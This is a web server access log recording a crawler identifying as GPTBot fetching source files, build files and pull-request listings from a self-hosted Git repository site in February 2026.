"/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=rendered" [Client 74.7.227.38] [Length 11046] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:17:44:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:17:44:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=source" [Client 74.7.227.38] [Length 11447] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:17:44:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=source" [Client 74.7.227.38] [Length 11839] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:17:44:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=rendered" [Client 74.7.227.38] [Length 11044] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:17:44:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11051] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:17:44:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10062] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:44:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:17:44:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=source" [Client 74.7.227.38] [Length 11838] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:17:44:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=rendered" [Client 74.7.227.38] [Length 11047] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:17:44:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/database.py?display=source" [Client 74.7.227.38] [Length 12555] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/database.py" +[17/Feb/2026:17:44:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/calculator.py?display=source" [Client 74.7.227.38] [Length 13082] [Gzip 3.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/calculator.py" +[17/Feb/2026:17:44:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?project=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:17:44:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:44:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10148] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:17:44:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9966] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&state=all&type=all" +[17/Feb/2026:17:44:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9958] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls" +[17/Feb/2026:17:44:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:44:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10064] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:44:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:44:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/controller.hpp?display=source" [Client 74.7.227.38] [Length 12770] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:17:44:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/controller.hpp?display=source" [Client 74.7.227.38] [Length 12772] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:17:44:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/controller.hpp?display=source" [Client 74.7.227.38] [Length 12772] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:17:44:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/controller.hpp?display=source" [Client 74.7.227.38] [Length 12739] [Gzip 4.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:17:44:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/itransport.hpp?display=source" [Client 74.7.227.38] [Length 12826] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:17:44:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/itransport.hpp?display=source" [Client 74.7.227.38] [Length 12861] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:17:44:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/itransport.hpp?display=source" [Client 74.7.227.38] [Length 12859] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:17:44:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/itransport.hpp?display=source" [Client 74.7.227.38] [Length 12860] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:17:44:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:44:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:44:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:44:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10053] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:44:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:44:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/controller.hpp?display=source" [Client 74.7.227.38] [Length 12348] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:17:44:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/data_format.hpp?display=rendered" [Client 74.7.227.38] [Length 11047] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:17:44:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=rendered" [Client 74.7.227.38] [Length 11082] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:17:44:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13009] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:17:44:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11082] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:17:44:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/main.cpp?display=source" [Client 74.7.227.38] [Length 11642] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:44:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:17:44:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:17:44:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:17:44:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10143] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues" +[17/Feb/2026:17:44:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/compile_commands.json?display=source" [Client 74.7.227.38] [Length 11418] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:17:44:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:44:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/import%20sys.py?display=source" [Client 74.7.227.38] [Length 11420] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/import%20sys.py" +[17/Feb/2026:17:44:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/import%20sys.py?display=source" [Client 74.7.227.38] [Length 11421] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/import%20sys.py" +[17/Feb/2026:17:44:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11316] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/metadata.json" +[17/Feb/2026:17:44:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/status.json?display=rendered" [Client 74.7.227.38] [Length 10915] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/status.json" +[17/Feb/2026:17:44:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/status.json?display=source" [Client 74.7.227.38] [Length 11090] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/status.json" +[17/Feb/2026:17:44:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11318] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/metadata.json" +[17/Feb/2026:17:44:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/status.json?display=source" [Client 74.7.227.38] [Length 11093] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/status.json" +[17/Feb/2026:17:44:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/status.json?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 